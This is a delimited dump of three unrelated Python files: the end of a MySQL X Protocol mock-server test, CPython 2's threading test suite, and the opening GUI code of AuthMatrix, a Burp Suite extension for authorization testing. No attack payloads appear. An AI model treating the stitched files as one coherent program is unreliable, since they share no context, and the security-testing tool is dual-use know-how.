protocol.send_auth_ok()
# Read message
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 12)
# Read payload
_ = stream.read(msg_len - 1)
# send another notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 12 Mysqlx.Resultset.ColumnMetaData
stream.sendall(b"\x31\x00\x00\x00\x0c"
b"\x08\x07\x12\x08\x44\x61\x74\x61\x62\x61\x73"
b"\x65\x1a\x08\x44\x61\x74\x61\x62\x61\x73\x65"
b"\x22\x08\x53\x43\x48\x45\x4d\x41\x54\x41\x2a"
b"\x00\x32\x00\x3a\x03\x64\x65\x66\x40\x4c\x50"
b"\xc0\x01\x58\x10")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 13 Mysqlx.Resultset.Row
stream.sendall(b"\x16\x00\x00\x00\x0d"
b"\x0a\x13\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69"
b"\x6f\x6e\x5f\x73\x63\x68\x65\x6d\x61\x00")
# msg_type: 14 Mysqlx.Resultset.FetchDone
stream.sendall(b"\x01\x00\x00\x00\x0e")
# msg_type: 11 Mysqlx.Notice.Frame
stream.sendall(b"\x0f\x00\x00\x00\x0b\x08\x03\x10\x02\x1a\x08\x08"
b"\x04\x12\x04\x08\x02\x18\x00")
# send unexpected notice
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
# msg_type: 17 Mysqlx.Sql.StmtExecuteOk
stream.sendall(b"\x01\x00\x00\x00\x11")
# Read message
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 7)
# Read payload
_ = stream.read(msg_len - 1)
stream.sendall(b"\x07\x00\x00\x00\x00\n\x04bye!")
# Close socket
stream.close()
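# A minimal sketch (not part of the original suite) of the X Protocol
# framing used throughout _server_thread: a 5-byte header holding a
# little-endian uint32 length (type byte plus payload) and a one-byte
# message type, followed by the payload. Helper names are illustrative.
import struct

def pack_frame(msg_type, payload=b""):
    # the length counts the type byte but not the length field itself
    return struct.pack("<LB", len(payload) + 1, msg_type) + payload

def unpack_header(header):
    # inverse of the header above; the payload is the next (length - 1) bytes
    return struct.unpack("<LB", header)

assert pack_frame(0x0b) == b"\x01\x00\x00\x00\x0b"  # the empty notice above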
@unittest.skipIf(not HAVE_MYSQLXPB_CEXT, "C Extension not available")
def test_initial_empty_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 10
worker1 = Thread(target=self._server_thread, args=[host, port, 1])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
def test_initial_empty_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 20
worker2 = Thread(target=self._server_thread, args=[host, port, 1])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
@unittest.skipIf(not HAVE_MYSQLXPB_CEXT, "C Extension not available")
def test_initial_notice_cext(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 11
worker1 = Thread(target=self._server_thread, args=[host, port, 2])
worker1.daemon = True
worker1.start()
sleep(1)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = False
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
def test_initial_notice_pure(self):
connect_kwargs = self.connect_kwargs.copy()
host = "localhost"
port = connect_kwargs["port"] + 21
worker2 = Thread(target=self._server_thread, args=[host, port, 2])
worker2.daemon = True
worker2.start()
sleep(2)
settings = self.settings.copy()
settings["port"] = port
settings["use_pure"] = True
session = mysqlx.get_session(settings)
rows = session.sql("show databases").execute().fetch_all()
self.assertEqual(rows[0][0], "information_schema")
session.close()
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
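# Standalone sketch of the gimmick under test (CPython-only; hedged --
# not part of the original suite). PyThreadState_SetAsyncExc takes a
# thread id and an exception class and returns the number of thread
# states it modified:
#
#   import ctypes, thread
#   class Stop(Exception):
#       pass
#   tid = thread.get_ident()  # target thread id
#   n = ctypes.pythonapi.PyThreadState_SetAsyncExc(
#       ctypes.c_long(tid), ctypes.py_object(Stop))
#   # n == 0 means no such thread; n == 1 means Stop is now pending there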
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue 1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite from hanging forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
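# The weakref mechanics relied on above, in isolation (hedged sketch,
# not from the original suite): once the last strong reference goes
# away, the weak reference starts returning None -- that is how this
# test proves the Thread/target refcycle was really collected.
#
#   import weakref
#   class Box(object):
#       pass
#   box = Box()
#   ref = weakref.ref(box)
#   assert ref() is box
#   del box                 # on CPython the refcount hits zero here
#   assert ref() is None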
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx'):
print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
' due to known OS bugs on'), sys.platform
return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# A Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
AuthMatrix.py | # Copyright (c) 2016 Mick Ayzenberg - Security Innovation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from burp import IBurpExtender
from burp import ITab
from burp import IMessageEditorController
from burp import IContextMenuFactory
from burp import IHttpRequestResponse
from java.awt import Component;
from java.awt import GridBagLayout;
from java.awt import GridBagConstraints;
from java.awt import Dimension;
from java.util import ArrayList;
from java.lang import Boolean;
from javax.swing import JScrollPane;
from javax.swing import JSplitPane;
from javax.swing import JTabbedPane;
from javax.swing import JPanel;
from javax.swing import JButton;
from javax.swing import JTable;
from javax.swing import JOptionPane;
from javax.swing import JMenuItem;
from javax.swing import JCheckBox;
from javax.swing import JComboBox;
from javax.swing import DefaultCellEditor;
from javax.swing import JLabel;
from javax.swing import JFileChooser;
from javax.swing import JPopupMenu;
from javax.swing import JTextField;
from javax.swing import TransferHandler;
from javax.swing import DropMode;
from javax.swing import JSeparator;
from javax.swing import SwingConstants;
from javax.swing import JList
from javax.swing import AbstractCellEditor
from javax.swing import Timer
from java.awt.datatransfer import StringSelection;
from java.awt.datatransfer import DataFlavor;
from javax.swing.table import AbstractTableModel;
from javax.swing.table import TableCellRenderer;
from javax.swing.table import JTableHeader;
from javax.swing.table import TableCellEditor
from java.awt import Color;
from java.awt import Font;
from java.awt.event import MouseAdapter;
from java.awt.event import ActionListener;
from java.awt.event import ItemListener;
from java.awt.event import ItemEvent;
from javax.swing.event import DocumentListener;
from javax.swing.event import ChangeListener;
import java.lang;
from org.python.core.util import StringUtil
from threading import Lock
from threading import Thread
import traceback
import re
import urllib
import hashlib
import json
import base64
import random
import string
AUTHMATRIX_VERSION = "0.8.2"
class BurpExtender(IBurpExtender, ITab, IMessageEditorController, IContextMenuFactory):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our Burp callbacks object
self._callbacks = callbacks
# obtain a Burp extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("AuthMatrix - v"+AUTHMATRIX_VERSION)
# DB that holds everything: users, roles, and messages
self._db = MatrixDB()
# For saving/loading config
self._fc = JFileChooser()
# Used by inner classes
selfExtender = self
self._selectedColumn = -1
self._selectedRow = -1
# Table of Chain entries (NOTE: must be instantiated before userTable since it's referenced there)
self._chainTable = ChainTable(model = ChainTableModel(self))
chainScrollPane = JScrollPane(self._chainTable)
self._chainTable.redrawTable()
# Table of User entries
self._userTable = UserTable(model = UserTableModel(self))
roleScrollPane = JScrollPane(self._userTable)
self._userTable.redrawTable()
# Table of Request (AKA Message) entries
self._messageTable = MessageTable(model = MessageTableModel(self))
messageScrollPane = JScrollPane(self._messageTable)
self._messageTable.redrawTable()
# Set Messages to reorderable
self._messageTable.setDragEnabled(True)
self._messageTable.setDropMode(DropMode.INSERT_ROWS)
self._messageTable.setTransferHandler(RowTransferHandler(self._messageTable))
# Set Users to reorderable
self._userTable.setDragEnabled(True)
self._userTable.setDropMode(DropMode.INSERT_ROWS)
self._userTable.setTransferHandler(RowTransferHandler(self._userTable))
# Semi-Generic Popup stuff
def addPopup(component, popup):
class genericMouseListener(MouseAdapter):
def mousePressed(self, e):
if e.isPopupTrigger():
self.showMenu(e)
def mouseReleased(self, e):
if e.isPopupTrigger():
self.showMenu(e)
def showMenu(self, e):
# NOTE: testing if .locked is OK here since it's a manual operation
if selfExtender._db.lock.locked():
return
if type(component) is JTableHeader:
table = component.getTable()
column = component.columnAtPoint(e.getPoint())
if (type(table) is MessageTable
and column >= selfExtender._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT
or type(table) is UserTable
and column >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT):
selfExtender._selectedColumn = column
else:
return
else:
selfExtender._selectedRow = component.rowAtPoint(e.getPoint())
popup.show(e.getComponent(), e.getX(), e.getY())
component.addMouseListener(genericMouseListener())
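# Note on the pattern above (not in the original source): Swing fires
# the popup trigger on mousePressed on some platforms and on
# mouseReleased on others, which is why isPopupTrigger() must be
# checked in both callbacks.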
class actionRunMessage(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
indexes = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getMessageByRow(rowNum)._index for rowNum in selfExtender._messageTable.getSelectedRows()]
t = Thread(target=selfExtender.runMessagesThread, args = [indexes])
t.start()
selfExtender._selectedColumn = -1
# Redrawing the table happens during color-coding within the thread
class actionToggleEnableUser(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._userTable.getSelectedRows():
usersArray = [selfExtender._db.getUserByRow(selfExtender._selectedRow)]
else:
usersArray = [selfExtender._db.getUserByRow(rowNum) for rowNum in selfExtender._userTable.getSelectedRows()]
for userEntry in usersArray:
userEntry.toggleEnabled()
selfExtender._selectedColumn = -1
selfExtender._userTable.redrawTable()
class actionToggleEnableMessage(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messagesArray = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messagesArray = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
for messageEntry in messagesArray:
messageEntry.toggleEnabled()
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionToggleEnableChain(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._chainTable.getSelectedRows():
chainArray = [selfExtender._db.getChainByRow(selfExtender._selectedRow)]
else:
chainArray = [selfExtender._db.getChainByRow(rowNum) for rowNum in selfExtender._chainTable.getSelectedRows()]
for chainEntry in chainArray:
chainEntry.toggleEnabled()
selfExtender._selectedColumn = -1
selfExtender._chainTable.redrawTable()
class actionRemoveMessage(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
indexes = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getMessageByRow(rowNum)._index for rowNum in selfExtender._messageTable.getSelectedRows()]
for i in indexes:
selfExtender._db.deleteMessage(i)
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
selfExtender._chainTable.redrawTable()
class actionRemoveUser(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._userTable.getSelectedRows():
indexes = [selfExtender._db.getUserByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getUserByRow(rowNum)._index for rowNum in selfExtender._userTable.getSelectedRows()]
for i in indexes:
selfExtender._db.deleteUser(i)
selfExtender._selectedColumn = -1
selfExtender._userTable.redrawTable()
selfExtender._chainTable.redrawTable()
class actionRemoveChain(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._chainTable.getSelectedRows():
indexes = [selfExtender._db.getChainByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getChainByRow(rowNum)._index for rowNum in selfExtender._chainTable.getSelectedRows()]
for i in indexes:
selfExtender._db.deleteChain(i)
selfExtender._selectedColumn = -1
selfExtender._chainTable.redrawTable()
class actionRemoveColumn(ActionListener):
def __init__(self, table):
self._table = table
def actionPerformed(self,e):
if selfExtender._selectedColumn >= 0:
if self._table == "u":
# Delete Role
if selfExtender._selectedColumn >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT + selfExtender._db.headerCount + selfExtender._db.arrayOfSVs.size():
selfExtender._db.deleteRole(selfExtender._db.getRoleByColumn(
selfExtender._selectedColumn, self._table)._index)
# Delete SV
elif selfExtender._selectedColumn >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT + selfExtender._db.headerCount:
selfExtender._db.deleteSV(selfExtender._selectedColumn-(selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT+selfExtender._db.headerCount))
# Delete Header
elif selfExtender._selectedColumn >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT:
selfExtender._db.deleteHeader(selfExtender._selectedColumn-selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT)
elif self._table == "m":
# Delete Role
selfExtender._db.deleteRole(selfExtender._db.getRoleByColumn(
selfExtender._selectedColumn, self._table)._index)
selfExtender._selectedColumn = -1
selfExtender._userTable.redrawTable()
selfExtender._messageTable.redrawTable()
selfExtender._chainTable.redrawTable()
class actionToggleRegex(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messages = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messages = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
for m in messages:
m.setFailureRegex(not m.isFailureRegex())
m.clearResults()
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionChangeRegexes(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messages = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messages = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
newRegex,failureRegex = selfExtender.changeRegexPopup()
if newRegex:
for message in messages:
message._regex = newRegex
message.setFailureRegex(failureRegex)
# Add to the list of regexes if it's not already there
if newRegex not in selfExtender._db.arrayOfRegexes:
selfExtender._db.arrayOfRegexes.append(newRegex)
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionChangeDomain(ActionListener):
def replaceDomain(self, requestResponse, newDomain):
requestInfo = selfExtender._helpers.analyzeRequest(requestResponse)
reqBody = requestResponse.getRequest()[requestInfo.getBodyOffset():]
newHeaders = ModifyMessage.getNewHeaders(requestInfo, None, ["Host: "+newDomain])
newreq = selfExtender._helpers.buildHttpMessage(newHeaders, reqBody)
return newreq
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messages = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messages = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
# Autofill the service values if they are all the same
uniqueServices = [(message._requestResponse.getHttpService().getHost(),
message._requestResponse.getHttpService().getPort(),
message._requestResponse.getHttpService().getProtocol()) for message in messages]
service = None if len(set(uniqueServices)) != 1 else messages[0]._requestResponse.getHttpService()
